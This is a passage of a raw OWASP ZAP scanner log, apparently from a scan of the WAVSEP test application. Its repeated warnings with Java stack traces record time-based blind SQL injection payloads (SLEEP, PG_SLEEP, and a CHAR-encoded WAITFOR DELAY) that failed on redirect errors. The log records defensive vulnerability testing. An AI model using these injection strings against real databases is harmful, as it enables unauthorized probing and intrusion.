[ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%';(SELECT * FROM (SELECT(SLEEP(5)))RAxm)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%';(SELECT * FROM (SELECT(SLEEP(5)))RAxm)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922437 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp;(SELECT * FROM (SELECT(SLEEP(5)))NLBi)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp;(SELECT * FROM (SELECT(SLEEP(5)))NLBi)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922438 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp);SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp);SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922439 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp;SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp;SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922441 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp');SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp');SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922442 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp';SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp';SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922444 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%';SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%';SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922446 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp;SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp;SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922447 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp);WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp);WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922448 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922450 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp');WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp');WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922465 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922466 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp%';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 8922468 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/LFI/LFI-FalsePositives-GET/validfile1.jsp;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown 